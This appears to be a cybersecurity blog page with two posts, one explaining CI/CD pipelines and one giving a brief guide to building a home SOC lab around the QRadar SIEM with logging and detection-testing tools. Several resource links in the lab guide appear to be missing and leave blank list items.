This blog is all about Cyber Security and IT

Thursday, April 20, 2023

Concept of CI/CD in Detail

CI stands for Continuous Integration. 

The purpose of CI is to provide developers with rapid feedback regarding the quality of their code in relation to the rest of the project. When changes are made to the git repository (or SVN or another preferred version control system), a PR (pull request) is created to merge the changes into the main branch. This triggers the CI pipeline, which compiles and builds the code (if applicable) and performs various automated tests, such as unit tests and code coverage.

The purpose of these tests is to ensure that the code integrates well with the rest of the application. If all tests pass, the code can be merged into the main branch with approval from another team member. The CI pipeline should also prepare an artifact, which can be a simple zip file or a more complex executable file or package. The artifact is then pushed to an artifactory, such as AWS S3 or Nexus, which allows for versioning.

CD ensures that the code is not only integrated well with the application but is also deployable to an environment that closely mimics production. If the application follows a microservices architecture, CD performs tests against the entire system, including end-to-end tests and User Acceptance Tests (UAT). CD pulls the artifact from the artifactory and delivers it to one or more environments. The same artifact is used in all stages of CD.

However, delivering the artifact to production must be done manually due to its criticality. Someone must select which version of the artifact can be released to production and trigger the same CD process against the live environment. CD involves working with deployment, which can range from simply uploading files through FTP or rsync to using configuration management tools like Ansible or AWS SSM. If the environment is containerized, kubectl, helm, and kustomize are used. Environments can also be created and destroyed on the fly using IaC tools like Terraform and Packer.

In more advanced scenarios, deployment to production can also be automated, known as continuous deployment. However, it requires extensive testing to guarantee code and application quality in production. QA includes functional testing, performance testing, stress testing, among others. CD should also feature the ability to roll back failed deployments, which can be achieved through blue/green deployments and feature gates.

Wednesday, March 29, 2023

How to Study Cyber SOC at home in 2023

Below is the complete guide to help you study cyber SOC at home.

Lets install SIEM First:

 There are various SIEM in the market like: QRadar, Graylog, ELK, Splunk, SumoLogic etc but we will example of Q RADAR

Download >
install >

All material you need:- 

If you encounter any of these issues below, I've collected the solutions.

. install WinCollect Agent another way: |

. send Linux logs to Qradar

. No Log Activity | Qradar CE

. No Log Activity | Qradar Code:

. Logs source problem:

. Modify maximum Log size using Group Policy

. Rule creation, use case creation Basic in Qradar SIEM |

✔️ Don't forget to generate an Authentication token from AS to write in WinCollect Agent when you install it

✔️ where logs and events from Windows, Linux, DB,..,etc :
 . DSM Configuration Guide:
Does it work? Great! That is a mini SOC. Document it somewhere and link it to your resume.🙏

------> Additional steps: <------

- Increase log visibility (activate PowerShell logging, Scriptblock logging, install Sysmon, etc)

- Install extra tools to get more visibility e.g.: Bluespan, DeepBlueCLI, Suricata Zeek, RITA (all are on GitHub)

- Test your setting! Be a bad guy and try to catch yourself. (WinPwn, Atomic Red Team, Caldera -> again, check out GitHub)

- If needed improve your SIEM with matching alert rules and build Dashboards. (Ideas? Look at Sigma rules -> GitHub)